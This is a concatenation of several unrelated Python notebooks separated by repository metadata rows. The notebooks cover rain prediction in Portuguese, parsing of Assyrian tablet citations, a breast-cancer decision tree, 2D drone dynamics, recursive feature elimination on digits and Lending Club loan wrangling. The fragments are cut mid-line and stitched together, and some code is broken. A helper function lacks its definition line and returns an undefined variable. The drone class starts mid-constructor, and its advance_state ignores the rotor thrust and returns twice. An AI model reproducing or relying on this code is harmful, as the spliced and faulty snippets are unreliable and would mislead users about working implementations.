# Vamo retirar também "temp Com Media" como visto na Etapa de AED
dfdd.drop(['Temp Comp Media'], inplace=True, axis=1)
dfdd
# +
dfdh = pd.read_csv("dados_horarios_semcab.txt", sep = ";")
dfdh.drop(['Unnamed: 9','Unnamed: 10'], inplace=True, axis=1) # limpeza da coluna sem informacao
dfdd.Data = pd.to_datetime(dfdd.Data)
dfdh.Data = pd.to_datetime(dfdh.Data)
dfmergeimp = pd.merge(dfdd,dfdh,how='inner', on=['Data','Hora'])
dfmergeimp.sort_values(by="Data")
# -
dfmergeimp.to_csv("dfimput.csv") #salvando em ddreais.csv"
# # 3) Etapas do machine learning
#
# ## Carregamento dos Dataset
dfimput = pd.read_csv("dfimput.csv", sep = ",")
dfimput.drop(['Unnamed: 0','Estacao'], inplace=True, axis=1) # limpeza da coluna sem informacao
dfimput
# +
dfreais = pd.read_csv("ddreais.csv", sep = ",")
dfreais.drop(['Unnamed: 0'], inplace=True, axis=1) # limpeza da coluna sem informacao
dfreais
# -
# ## Discretização
#
# Poderíamos usar os valores reais em "mm" da precipitação ou então discretizar de acordo com o tipo de precipitação, por exemplo:
#
# #### Classificação por intensidade da chuva
#
# classes: Dia Seco (DS): P < 2,2;
#
# Chuva muito fraca (Cmf): 2,2 ≤ P < 4,2;
#
# Chuva fraca (Cf): 4,2 ≤ P < 8,4;
#
# Chuva Moderada (CM): 8,4 ≤ P < 18,6;
#
# Chuva Forte (CF): 18,6 ≤ P < 55,3;
#
# Chuva Muito Forte (CMF): P ≥ 55,3.
#
# fonte :https://periodicos.ufpe.br/revistas/rbgfe/article/view/232788
#
# ### Entretanto vamos apenas focar no escopo do projeto que é responder qual a probabilidade de chover em um certo dia, dada as condições climáticas.
# +
# Discretize precipitation into two classes: days with more than 2.2 mm of
# rain are labelled "chuva" (rain), everything else "seco" (dry).
# PERF FIX: replaces the original row-by-row iterrows()/.loc loop with one
# vectorized Series.map — same labels, no per-row indexing.  (The old inline
# comment about SIM/NAO labels described code that no longer existed.)
dfreais['Precipitacao'] = dfreais['Precipitacao'].map(lambda p: "chuva" if p > 2.2 else "seco")
dfreais
# +
# Same discretization for the imputed dataset: > 2.2 mm -> "chuva", else "seco".
# PERF FIX: vectorized Series.map instead of the iterrows()/.loc loop.
dfimput['Precipitacao'] = dfimput['Precipitacao'].map(lambda p: "chuva" if p > 2.2 else "seco")
dfimput
# -
# ## Balanceamento dos dados
#
# O ideia é deixar o dataset balanceado como mostrado abaixo,
# fazendo um <i>Undersampling</i> perdemos muitas instâncias e, por outro lado, se
# usarmos o <i>oversampling</i> podemos influenciar demais na etapa de aprendizado.
# Nos casos de dataset que necessitam de balanceamento, a porcentagem das
# classes também sao fatores de <i>tuning</i>.
#
# Neste caso, devido à grande queda de instância, provalvemente seria
# melhor o uso de um algoritmo mais robusto à classe desbalanceadas como, baseados
# no paradgma simbólico ou modelos que fazem essa penalização como penalized-SVM e penalized-LDA
print(dfimput.groupby('Precipitacao').size())
print(dfreais.groupby('Precipitacao').size())
# +
dfreais['Precipitacao'].hist(figsize=(6,6)) # classes totalmente desbalanceada
plt.show()
# -
dfimput['Precipitacao'].hist(figsize=(6,6)) # classes totalmente desbalanceada
plt.show()
# Como visto pelos histogramas temos muita instância da classe seco e pouca da classe chuva.
# +
count_class_0, count_class_1 = dfimput.Precipitacao.value_counts()
df_class_0 = dfimput[dfimput['Precipitacao'] == "seco"]
df_class_1 = dfimput[dfimput['Precipitacao'] == "chuva"]
df_class_0_under = df_class_0.sample(count_class_1)
dfimput_under = pd.concat([df_class_0_under, df_class_1], axis=0)
print('Random under-sampling:')
print(dfimput_under.Precipitacao.value_counts())
dfimput_under.Precipitacao.value_counts().plot(kind='bar', title='Total de Precipitacao por classe');
# +
count_class_0, count_class_1 = dfreais.Precipitacao.value_counts()
df_class_0 = dfreais[dfreais['Precipitacao'] == "seco"]
df_class_1 = dfreais[dfreais['Precipitacao'] == "chuva"]
df_class_0_under = df_class_0.sample(count_class_1)
dfreais_under = pd.concat([df_class_0_under, df_class_1], axis=0)
print('Random under-sampling:')
print(dfreais_under.Precipitacao.value_counts())
dfreais_under.Precipitacao.value_counts().plot(kind='bar', title='Total de Precipitacao por classe');
# -
# ### Importação da biblioteca
# +
from sklearn.model_selection import train_test_split
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import StratifiedKFold
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score
from sklearn.linear_model import LogisticRegression
from sklearn.tree import DecisionTreeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
# -
# ### Split do dataset
# ### Escolha entre A)(real) ou B)(artificial) :
# ##### A) Dataset sem imputação dos valores ausentes
# +
array = dfreais_under.values
X = array[:,2:9]
y = array[:,1]
X_train, X_validation, Y_train, Y_validation = train_test_split(X, y, test_size=0.20, random_state=1)
# -
# ##### b) Dataset com imputação dos valores ausentes
# +
array = dfimput_under.values
X = array[:,3:14]
y = array[:,2]
X_train, X_validation, Y_train, Y_validation = train_test_split(X, y, test_size=0.20, random_state=1)
# -
# ### Elaboração do model
# +
models = []
models.append(('LR', LogisticRegression(solver='liblinear', multi_class='ovr')))
models.append(('LDA', LinearDiscriminantAnalysis()))
models.append(('KNN', KNeighborsClassifier()))
models.append(('CART', DecisionTreeClassifier()))
models.append(('NB', GaussianNB()))
models.append(('SVM', SVC(gamma='auto')))
results = []
names = []
for name, model in models:
kfold = StratifiedKFold(n_splits=10, random_state=1)
cv_results = cross_val_score(model, X_train, Y_train, cv=kfold, scoring='accuracy')
results.append(cv_results)
names.append(name)
print('%s: %f (%f)' % (name, cv_results.mean(), cv_results.std()))
# -
# ### Comparação dos modelos
pyplot.boxplot(results, labels=names)
pyplot.title('Comparacao dos algoritmos sem balanceamento')
pyplot.show()
# +
model = LogisticRegression(solver='liblinear', multi_class='ovr')
model.fit(X_train, Y_train)
predictions = model.predict(X_validation)
print(accuracy_score(Y_validation, predictions))
print(confusion_matrix(Y_validation, predictions))
print(classification_report(Y_validation, predictions))
# -
# ## Predição
# +
Xnew = [[14.0,15.0,14.7,97,934.7,18,3.3]]
# make a prediction
ynew = model.predict(Xnew)
print("X=%s, Predicted=%s" % (Xnew[0], ynew[0]))
# -
# ## Considerações Finais
#
# O banco de dados sem imputação dos dados ausentes, apesar de ser um dataset pequeno, feito com apenas dados fornecidos e apresentar um desempenho minimamente pior, ainda seria elegível, pois não tivemos ganhos tão significativos a ponto de valer a pena correr o risco de ter um model tendencioso.
| 19,175 |
/City Footnotes.ipynb
|
0cf3994e36dc74742760a012bcec43266a7ac94d
|
[] |
no_license
|
deehrlich/Assyrian-Project
|
https://github.com/deehrlich/Assyrian-Project
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 23,294 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <div class="alert alert-success">
# <b>Author</b>:
#
# Rashik Rahman
# [email protected]
#
# </div>
#
#
# **[Click here to see class lecture](https://drive.google.com/file/d/1-DHsPFHcucGlepA7ph4R0f4RfnzWmA07/view)**
#
# ## No class was conducted!
t = unicodedata.normalize('NFKD', text).encode('ASCII', 'ignore')
return r_text.decode(encoding='UTF-8')
#the city and string need to be changed manually
#Python cannot read underlined words, so you must manually put an '!' infront of the underlined word
city = 'Purušhaddum'
string ='Amkuwa: AKT 6, 104, Buruddum: BIN 6, 34, Dinarnu: CCT 5, 1b, Durhumit: !kt 89/k 430; !kt 91/k 424; !kt 94/k 310; !kt 94/k 340; !kt 94/k 1673; !kt a/k 1056b; AKT 6, 144; AKT 6, 150; !BIN 4, 36; BIN 4, 64; CCT 4, 48a; CCT 5, 13a; kt c/k 212; kt c/k 237; !CTMMA 1, 79; !I 750; !I 790; KTK 14; !kt n/k 227; !kt n/k 483; !kt n/k 805; !kt n/k 1277; TC 2, 23; TC 2, 36; !TC 3, 149; TPAK 1, 161a+b; VS 26, 18; !VS 26 71, Eluhhut: c/k 528, Hahhum: !kt 94/k 403; kt c/k 695; !kt h/k 73; I 430; KUG 13; !kt m/k 75; kt n/k 1509, Haqa: KTS 1, 22b, Hattum: AKT 6, 150; CCT 5, 15b; I 490; KTP 25; LB 1206; RA 58, 150 (MAH 10283), Hurama: !kt 94/k 1673; ATHE 63; BIN 4, 48; TC 1, 9, Kuburnat: kt a/k 403; kt a/k 513; Kunanamit: LB 1206; VS 26, 71, Luhuzattiya: kt 92/k 1036; kt c/k 367; kt m/k 148; kt n/k 283, Mamma: CCT 2, 11a; KTH 1; Tab. Naster (VAT 26.46), Marithum: CCT 5, 13a, Ninašša: !kt 94/k 345; !kt c/k 669; !TC 3, 165, Qaṭṭara: ICK 1, 189; Ka 848; Ka 970, Šalatuwar: !kt 83/k 117; !kt 87/k 465; !kt 91/k 424; !kt 93/k 285; !kt 94/k 153; !kt 94/k 651; !kt 94/k 1323; !AKT 3, 34; AKT 6, 176; BIN 4, 35; !Cole 2; KTP 10; MIXON 18; !kt n/k 1490; !TC 2, 36, māt Šarla: AKT 1, 78, Šašassama: AKT 6, 104, Šinahuttum: kt 94/k 340, Talhat: kt 87/k 463; kt 94/k 690; VS 26, 31 (wr. 
Tilhat), Tawiniya: ATHE 63, Tegarama: kt 92/k 1036; kt n/k 468; Timelkiya: AKT 6, 144; AKT 6, 176; !BIN 4, 48; kt c/k 337; !kt h/k 73, Tišmurna: kt 94/k 310; AKT 6, 144; AKT 6, 150; !CCT 4, 47a; POAT 16, Titattum: VS 26, 26, Tuhpiya: !kt 91/k 424; kt 94/k 419; !kt n/k 1490; !VS 26, 26, Tum(e)liya: !kt 91/k 345; AKT 6, 141; AKT 6, 144; AKT 6, 175, Ulama: !kt 83/k 117; kt 88/k 507b; !kt 91/k 345; !kt 94/k 340; !kt 94/k 1323; AKT 6, 216; kt c/k 212; !kt c/k 445; kt c/k 669; I 484; I 766; kt k/k 43; !KTS 2, 40; !kt n/k 696; !TC 3, 165, Uršu: ATHE 37, Ušbugattum: !kt 91/k 424, Ušša: BIN 4, 187; I 766, Wahšušana: !kt 83/k 117; !kt 87/k 44; !kt 87/k 465; kt 88/k 507b; !kt 89/k 430; !kt 91/k 345; !kt 91/k 424; !kt 91/k 475; !kt 94/k 310; !kt 94/k 340; kt 94/k 345; kt 94/k 365; kt 94/k 497; kt 94/k 825; kt 94/k 970; !kt 94/k 1670; !kt a/ k 1056b; AKT 1, 78; !AKT 3, 34; AKT 6, 175; ATHE 63; !BIN 4, 36; BIN 4, 43; kt c/k 48; !kt c/k 50; kt c/k 191; kt c/k 212; kt c/k 263; kt c/k 309; kt c/k 337; kt c/k 373; kt c/k 406; !kt c/k 669; kt c/k 735; kt c/k 866; CCT 4, 3a; !CCT 4, 4a; !CCT 4, 22b; CCT 6, 7c; KTH 1; !KTH 14; KTH 33; KTP 4; KTP 10; kt n/k 84; !kt n/k 227; !kt n/k 1456; !kt n/k 1490; !TC 2, 36; !TC 3, 3; TPAK 1, 161a+b; !TTC 28; !VS 26, 31; !VS 26, 84, Wašhaniya: !CCT 5, 15b; TC 3, 146; !TC 3, 165; VS 26, 46, Zalpa: ATHE 48; ATHE 63; BIN 6, 167; CCT 6, 7c; kt c/k 337; kt c/k 367; Ka 434, Zimišhuna: !kt 94/k 310; kt k/k 108'
cities_re = r'[a-zA-Z\’]{4,}:'
string = remove_accents(string)
cities_split = re.split(cities_re, string)
cities= re.findall(cities_re,string)
key=[x.split(';') for x in cities_split]
key = key[1:]
final = []
for i in range(len(key)):
for k in key[i]:
match = re.search(r'!',k)
if match:
k=re.sub(r', $','',k)
k=re.sub(r'!','',k)
final+=[(cities[i],k)]
final
# -
df= pd.DataFrame(final)
df.columns=['City Mentioned', 'Tablet']
df['City'] = city
df = df.set_index('City')
df['City Mentioned'] = df['City Mentioned'].map(lambda x: x.rstrip(':'))
df
pwd
# cd /Users/Deehrlich/Desktop/
df.to_excel(city+'.xlsx')
st:8080/"} id="o2SP9gkgYQF1" outputId="bd929662-0808-4935-c158-208ae9cc7975"
df['diagnosis'].value_counts()
# + colab={"base_uri": "https://localhost:8080/", "height": 438} id="pkaZjF4YYQF1" outputId="4e0824c8-d580-4963-b157-b3388119ae19"
df= df.drop(["id"], axis = 1)
df
# + colab={"base_uri": "https://localhost:8080/", "height": 320} id="AZJIBrDPYQF1" outputId="bb64c503-812c-4a05-b2ba-7c9a2a951655"
df = df.drop(["Unnamed: 32"], axis = 1)
df
# + [markdown] id="OzCc9MUqYQF2"
# # Visualization
# it is import to see that counts of different type of cancer
# + id="vm7xhoKJYQF2"
import matplotlib.pyplot as plt
import seaborn as sns
# + colab={"base_uri": "https://localhost:8080/"} id="i8IlIZseYQF2" outputId="70ae46f7-7179-44fc-895a-0cca191355a0"
benign, malignant=df['diagnosis'].value_counts()
print("No of Benign cell", benign)
print("No of malignant cell", malignant)
# + colab={"base_uri": "https://localhost:8080/", "height": 660} id="n6n-ABO2YQF3" outputId="1aae2b28-5e05-4435-8669-46411ca6f83b"
plt.figure(figsize=(10,10))
sns.countplot(df['diagnosis'])
plt.show()
# + colab={"base_uri": "https://localhost:8080/"} id="CQeu8vL9YQF3" outputId="5914eebd-ba3a-486a-87cc-78b4bea27420"
print("% of Benign cell is ", benign*100/len(df))
print("% of Malignant cell is ", malignant*100/len(df))
# + colab={"base_uri": "https://localhost:8080/", "height": 373} id="x5ARVQ3EYQF3" outputId="fa34a02b-29d1-4b14-c4cf-0f1470334d44"
df.diagnosis.value_counts().plot(kind='pie',shadow=True,colors=('darkgreen','orange'),autopct='%.2f',figsize=(8,6))
plt.title('Diagnosis')
plt.show()
# + [markdown] id="-_w5saLYYQF4"
# Pairplot helps to plot among the most useful feature
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="5Dj1IwPFYQF4" outputId="e3374311-c171-491b-a560-4e0b2f66a8fe"
cols=['diagnosis','radius_mean', 'texture_mean', 'perimeter_mean',
'area_mean','smoothness_mean', 'compactness_mean', 'concavity_mean',
'concave points_mean', 'symmetry_mean', 'fractal_dimension_mean']
plt.figure(figsize=(10,10))
sns.pairplot(data=df[cols],hue='diagnosis', palette='RdBu')
# + [markdown] id="8o9MQTMCYQF5"
# Heatmap:
#
# To find the most correlated features
# + id="UCijXMNjYQF5"
import numpy as np
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="f8aUbQVFYQF5" outputId="32d9b636-03b2-49e7-a90f-f1e7738238dd"
# Generate the correlation matrix
corr = df.corr().round(2)
# Mask for the upper triangle.
# FIX: np.bool was deprecated in NumPy 1.20 and later removed; use builtin bool.
mask = np.zeros_like(corr, dtype=bool)
# BUG FIX: the original line evaluated the fancy index without assigning it,
# leaving the mask all-False so the upper triangle was never hidden.
mask[np.triu_indices_from(mask)] = True
# Set figure size
f, ax = plt.subplots(figsize=(20, 20))
# Define custom colormap
cmap = sns.diverging_palette(220, 10, as_cmap=True)
# Draw the heatmap (upper triangle masked out)
sns.heatmap(corr, mask=mask, cmap=cmap, vmin=-1, vmax=1, center=0,
            square=True, linewidths=.5, cbar_kws={"shrink": .5}, annot=True)
plt.tight_layout()
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="oM1fbHTtYQF6" outputId="80829873-39cc-46f3-d6ff-203998d6bcf2"
# Generate and visualize the correlation matrix
corr = df.corr().round(2)
# Mask for the upper triangle
# FIX: np.bool was deprecated in NumPy 1.20 and later removed; use builtin bool
# so this cell keeps running on current NumPy versions.
mask = np.zeros_like(corr, dtype=bool)
mask[np.triu_indices_from(mask)] = True
# Set figure size
f, ax = plt.subplots(figsize=(20, 20))
# Define custom colormap
cmap = sns.diverging_palette(220, 10, as_cmap=True)
# Draw the heatmap
sns.heatmap(corr, mask=mask, cmap=cmap, vmin=-1, vmax=1, center=0,
            square=True, linewidths=.5, cbar_kws={"shrink": .5}, annot=True)
plt.tight_layout()
# + colab={"base_uri": "https://localhost:8080/", "height": 232} id="7gIE2fguYQF6" outputId="55643c9b-3db0-4f34-c33b-114b70b6d3dc"
M = df[df.diagnosis == "M"]
M.head()
# + colab={"base_uri": "https://localhost:8080/", "height": 232} id="VpYodAmIYQF7" outputId="eb373099-1c00-44f4-a3de-941acc063cd5"
B = df[df.diagnosis == "B"]
B.head()
# + colab={"base_uri": "https://localhost:8080/", "height": 295} id="wv08k4S_YQF7" outputId="49d0de34-dce5-4ccb-a9c5-1c6f82f01bac"
plt.title("Malignant vs Benign Tumor")
plt.xlabel("Radius Mean")
plt.ylabel("Texture Mean")
plt.scatter(M.radius_mean, M.texture_mean, color = "red", label = "Malignant", alpha = 0.3)
plt.scatter(B.radius_mean, B.texture_mean, color = "lime", label = "Benign", alpha = 0.3)
plt.legend()
plt.show()
# + [markdown] id="PMfWLnpkYQF8"
# # Meaning Of Decision Tree Algorithm
# Decision tree models where the target variable uses a discrete set of values are classified as Classification Trees.
#
# In these trees, each node, or leaf, represent class labels while the branches represent conjunctions of features leading to class labels.
#
# A decision tree where the target variable takes a continuous value, usually numbers, are called Regression Trees.
#
# The two types are commonly referred to together at CART (Classification and Regression Tree).
# + [markdown] id="H5QIlZcPYQF8"
# 
# + [markdown] id="32jfy0wgYQF8"
# # Decision Tree with Sklearn
# + id="VuxeIhQLYQF8"
feature_cols = ['radius_mean', 'texture_mean', 'perimeter_mean', 'area_mean','smoothness_mean', 'compactness_mean', 'concavity_mean','concave points_mean', 'symmetry_mean', 'fractal_dimension_mean']
# + id="XXff3fFCYQF9"
x = df[feature_cols]
y = df.diagnosis.values
# + colab={"base_uri": "https://localhost:8080/", "height": 195} id="S-QBFedjYQF9" outputId="95b06841-b9d8-4271-eca4-801c3bd406f8"
x.head()
# + [markdown] id="wk_Y5ERpYQF9"
# # What is normalization?
#
# Normalization is a technique often applied as part of data preparation for machine learning. The goal of normalization is to change the values of numeric columns in the dataset to use a common scale, without distorting differences in the ranges of values or losing information. Normalization is also required for some algorithms to model the data correctly.
# + [markdown] id="yi7KRteQYQF-"
# ## MinMax:
# The min-max normalizer linearly rescales every feature to the [0,1] interval.
#
# Rescaling to the [0,1] interval is done by shifting the values of each feature so that the minimal value is 0, and then dividing by the new maximal value (which is the difference between the original maximal and minimal values).
#
# The values in the column are transformed using the following formula:
#
# normalization using the min-max function
#
# 
# + colab={"base_uri": "https://localhost:8080/", "height": 402} id="EcT_ThQLYQF-" outputId="eaa4c056-47a5-4be3-c828-95d6d4b4b34f"
# Normalization:
x = (x - np.min(x)) / (np.max(x) - np.min(x))
x
# + colab={"base_uri": "https://localhost:8080/"} id="vxifSzkdYQF-" outputId="c6f055c6-9fe0-4579-feb8-4fe0c81af021"
from sklearn.model_selection import train_test_split
#for checking testing results
from sklearn.metrics import classification_report, confusion_matrix
#for visualizing tree
from sklearn.tree import plot_tree
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size = 0.2, random_state = 0)
print("Training split input- ", x_train.shape)
print("Testing split input- ", x_test.shape)
# + id="hc7cvG3nYQF-"
from sklearn.tree import DecisionTreeClassifier
# + id="zXyUc3GzYQF_"
dt = DecisionTreeClassifier()
# + colab={"base_uri": "https://localhost:8080/"} id="qWJd0NCGYQF_" outputId="777d437c-2901-4d8a-857c-9de4a7a1624d"
dt.fit(x_train, y_train)
# + [markdown] id="N1o7LR8vYQF_"
# ### Testing
# + [markdown] id="mIgkL9tiYQF_"
# #### Precision — Also called Positive predictive value
# The ratio of correct positive predictions to the total predicted positives.
# #### Recall — Also called Sensitivity, Probability of Detection, True Positive Rate
#
# The ratio of correct positive predictions to the total positives examples.
#
#
# + [markdown] id="REloluZiYQGA"
# ### Confusion matrix
# confusion matrix usage to evaluate the quality of the output of a classifier. The diagonal elements represent the number of points for which the predicted label is equal to the true label, while off-diagonal elements are those that are mislabeled by the classifier. The higher the diagonal values of the confusion matrix the better, indicating many correct predictions.
# + [markdown] id="5Wlb1VJ5YQGA"
# 
# + [markdown] id="uXOwF6QfYQGA"
# 
# + [markdown] id="HzaXJ3JzYQGA"
# ### Accuracy
# Talking about accuracy, our favourite metric!
#
# Accuracy is defined as the ratio of correctly predicted examples by the total examples.
# + [markdown] id="qUj80XgRYQGB"
# 
#
# 
# + colab={"base_uri": "https://localhost:8080/"} id="o1480BUpYQGB" outputId="5ecfd3e7-34d7-478d-9b68-9915f59d1589"
y_pred = dt.predict(x_test)
print("Classification report - \n", classification_report(y_test,y_pred))
# + colab={"base_uri": "https://localhost:8080/"} id="m4Jw-tlxYQGH" outputId="3e541d3a-cff8-453d-f321-035594d75296"
cm=confusion_matrix(y_test,y_pred)
cm
# + colab={"base_uri": "https://localhost:8080/", "height": 309} id="3d8FYp05YQGI" outputId="85e8bfc6-7649-4bb7-bc57-2df0fa321553"
plt.figure(figsize=(5,5))
sns.heatmap(data=cm,linewidths=1.0, annot=True,square = True, cmap = 'Blues')
plt.ylabel('Actual label')
plt.xlabel('Predicted label')
all_sample_title = 'Accuracy Score: {0}'.format(dt.score(x_test, y_test))
plt.title(all_sample_title, size = 15)
plt.savefig("/content/drive/My Drive/project videos")
# + colab={"base_uri": "https://localhost:8080/"} id="IKgHppxnSY2K" outputId="54b67613-f669-4a7d-ce95-2ac57cb4a238"
# ! pip install graphviz
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="Uw4cUjopYQGJ" outputId="bace8855-5989-44fb-8e2f-08847eb697cf"
# Visualising the graph without the use of graphviz
plt.figure(figsize = (50,50))
dec_tree = plot_tree(decision_tree=dt, feature_names = df.columns, class_names =["Malignant", "Benign"] , filled = True , precision = 4, rounded = True)
plt.savefig("/content/drive/My Drive/project videos")
# + id="JfHkITxaYQGJ"
| 14,206 |
/notebooks/control/lesson_1_vehicle_dynamics/5. Controlling a 2D Quad.ipynb
|
c34ba5599abcf254baa7f414cd7d3a49135526c4
|
[] |
no_license
|
shovan777/FCND-Backyard-Flyer
|
https://github.com/shovan777/FCND-Backyard-Flyer
| 0 | 0 | null | 2018-12-01T18:52:32 | 2018-11-30T14:32:28 | null |
Jupyter Notebook
| false | false |
.py
| 88,049 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %matplotlib inline
#
# # Recursive feature elimination
#
#
# A recursive feature elimination example showing the relevance of pixels in
# a digit classification task.
#
# <div class="alert alert-info"><h4>Note</h4><p>See also `sphx_glr_auto_examples_feature_selection_plot_rfe_with_cross_validation.py`</p></div>
#
#
#
# +
print(__doc__)
from sklearn.svm import SVC
from sklearn.datasets import load_digits
from sklearn.feature_selection import RFE
import matplotlib.pyplot as plt
# -
# Load the digits dataset
digits = load_digits()
X = digits.images.reshape((len(digits.images), -1))
y = digits.target
X.shape
plt.imshow(X[3, :].reshape((8,8)))
# Create the RFE object and rank each pixel
svc = SVC(kernel="linear", C=1)
rfe = RFE(estimator=svc, n_features_to_select=1, step=1)
rfe.fit(X, y)
ranking = rfe.ranking_.reshape(digits.images[0].shape)
rfe.ranking_
# Plot pixel ranking
plt.matshow(ranking, cmap=plt.cm.Blues)
plt.colorbar()
plt.title("Ranking of pixels with RFE")
plt.show()
[i for i in zip(range(64), rfe.ranking_)]
):
self.k_f = k_f
self.I_x = I_x
self.l = l
self.m = m
self.omega_1 = 0.0
self.omega_2 = 0.0
self.g = 9.81
# z, y, phi, z_dot, y_dot, phi_dot
self.X = np.array([0.0,0.0,0.0,0.0,0.0,0.0])
def advance_state_uncontrolled(self,dt):
"""Advances the state of the drone by dt seconds.
Note that this method assumes zero rotational speed
for both propellers."""
X_dot = np.array([
self.X[3],
self.X[4],
self.X[5],
self.g,
0.0,
0.0])
# Change in state will be
self.X = self.X + X_dot * dt
return self.X
def get_thrust_and_moment(self):
"""Helper function which calculates and returns the
collective thrust and the moment about the X axis"""
f1 = self.k_f * self.omega_1 ** 2
f2 = self.k_f * self.omega_2 ** 2
# c is often used to indicate "collective" thrust
c = f1 + f2
M_x = (f1 - f2) * self.l
return c, M_x
@property
def z_dot_dot(self):
"""Calculates vertical (z) acceleration of drone."""
c, M_x = self.get_thrust_and_moment()
phi = self.X[2]
a_z = self.g - c * math.cos(phi) / self.m
return a_z
@property
def y_dot_dot(self):
"""Calculates lateral (y) acceleration of drone."""
c, M_x = self.get_thrust_and_moment()
phi = self.X[2]
a_y = c * math.sin(phi) / self.m
return a_y
@property
def phi_dot_dot(self):
c, M_x = self.get_thrust_and_moment()
angular_acc = M_x / self.I_x
return angular_acc
############################
# BEGIN TODOS ##############
def advance_state(self, dt):
"""
Advances the state of the drone forward by dt seconds.
"""
X_dot = np.array([
self.X[3],
self.X[4],
self.X[5],
self.g,
0.0,
0.0])
# Change in state will be
self.X = self.X + X_dot * dt
return self.X
return self.X
def set_rotors_angular_velocities(self,linear_acc):
"""
Sets self.omega_1 and self.omega_2 to realize the desired
linear_acc. Note that this is for vertical motion ONLY. It
is assumed that rotational acceleration and phi is zero
"""
# TODO
omega = math.sqrt(self.m * (-linear_acc + self.g) /(2 * self.k_f))
self.omega_1 = omega
self.omega_2 = omega
return self.omega_1, self.omega_2
# ### Testing `advance_state` and `set_rotors`
# +
# Start by generating a target trajectory and
# target vertical acceleration
total_time = 3.0
dt = 0.002
t = np.linspace(0.0,total_time,int(total_time/dt))
z_path= 0.5*np.cos(2*t)-0.5
z_dot_dot_path= -2.0*np.cos(2*t)
# +
# Try to follow the trajectory.
# Store the state history as we go.
drone = Drone2D()
drone_state_history = drone.X
for i in range(t.shape[0]-1):
# setting the propeller velocities
drone.set_rotors_angular_velocities(z_dot_dot_path[i])
# calculating the new state vector
drone_state = drone.advance_state(dt)
# generate a history of vertical positions for drone
drone_state_history = np.vstack((drone_state_history, drone_state))
# -
# Compare the planned path to the one that has been executed!
plt.plot(t,z_path,linestyle='-',marker='o',color='red')
plt.plot(t,drone_state_history[:,0],linestyle='-',color='blue')
plt.grid()
plt.title('Change in height').set_fontsize(20)
plt.xlabel('$t$ [sec]').set_fontsize(20)
plt.ylabel('$z-z_0$ [$m$]').set_fontsize(20)
plt.xticks(fontsize = 14)
plt.yticks(fontsize = 14)
plt.legend(['planned path','executed path'],fontsize = 18)
plt.show()
# [Solution](/notebooks/5.%20Controlling%20a%202D%20Quad%20SOLUTION.ipynb)
et of variables included here are the intersection of what's available both when investors download historical data and when investors browse loans for manual investing.
#
# Data dictionary: https://resources.lendingclub.com/LCDataDictionary.xlsx
#
# Target: `charged_off`
#
# **This is a classification problem, so we'll choose a [scoring metric](https://scikit-learn.org/stable/modules/model_evaluation.html#common-cases-predefined-values) for classification: ROC AUC.**
#
# **For our evaluation protocol, we'll choose cross-validation with independent test set.**
# + id="7QpRtdfeQKPM" colab_type="code" colab={}
# %matplotlib inline
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
pd.options.display.max_columns = 500
pd.options.display.max_rows = 500
url = 'https://drive.google.com/uc?export=download&id=1AafT_i1dmfaxqKiyFofVndleKozbQw3l'
df = pd.read_csv(url)
X = df.drop(columns='charged_off')
y = df['charged_off']
X_train, X_test, y_train, y_test = train_test_split(
X, y, train_size=0.80, test_size=0.20, stratify=y, random_state=42)
def wrangle(X):
    """Feature-engineer a raw Lending Club loans frame (non-destructive).

    Works on a copy of ``X``: drops identifier/duplicative columns,
    converts string percentages to floats, derives date and job-title
    features, converts the highest-null columns into is-null indicator
    flags, and mean-imputes the remaining nulls.  Returns the wrangled
    copy; the caller's frame is untouched.

    NOTE(review): ``pd.Timestamp.today()`` makes ``earliest_cr_line``
    depend on the run date, so train/test must be wrangled in the same
    session for the feature to be comparable — confirm this is intended.
    """
    X = X.copy()
    # Drop some columns
    X = X.drop(columns='id') # id is random
    X = X.drop(columns=['member_id', 'url', 'desc']) # All null
    X = X.drop(columns='title') # Duplicative of purpose
    X = X.drop(columns='grade') # Duplicative of sub_grade
    # Transform sub_grade from "A1" - "G5" to 1.1 - 7.5
    def wrangle_sub_grade(x):
        # Letter grade A..G -> 1..7 via ASCII offset; digit becomes tenths.
        first_digit = ord(x[0]) - 64
        second_digit = int(x[1])
        return first_digit + second_digit/10
    X['sub_grade'] = X['sub_grade'].apply(wrangle_sub_grade)
    # Convert percentages from strings to floats
    X['int_rate'] = X['int_rate'].str.strip('%').astype(float)
    X['revol_util'] = X['revol_util'].str.strip('%').astype(float)
    # Transform earliest_cr_line to an integer: how many days it's been open
    X['earliest_cr_line'] = pd.to_datetime(X['earliest_cr_line'], infer_datetime_format=True)
    X['earliest_cr_line'] = pd.Timestamp.today() - X['earliest_cr_line']
    X['earliest_cr_line'] = X['earliest_cr_line'].dt.days
    # Create features for three employee titles: teacher, manager, owner
    # (case-normalized first; missing titles count as no match via na=False)
    X['emp_title'] = X['emp_title'].str.lower()
    X['emp_title_teacher'] = X['emp_title'].str.contains('teacher', na=False)
    X['emp_title_manager'] = X['emp_title'].str.contains('manager', na=False)
    X['emp_title_owner'] = X['emp_title'].str.contains('owner', na=False)
    # Drop categoricals with high cardinality
    X = X.drop(columns=['emp_title', 'zip_code'])
    # Transform features with many nulls to binary flags
    # (these columns are mostly missing, so "is it present at all?" carries
    # more signal than any imputed value would)
    many_nulls = ['sec_app_mths_since_last_major_derog',
                  'sec_app_revol_util',
                  'sec_app_earliest_cr_line',
                  'sec_app_mort_acc',
                  'dti_joint',
                  'sec_app_collections_12_mths_ex_med',
                  'sec_app_chargeoff_within_12_mths',
                  'sec_app_num_rev_accts',
                  'sec_app_open_act_il',
                  'sec_app_open_acc',
                  'revol_bal_joint',
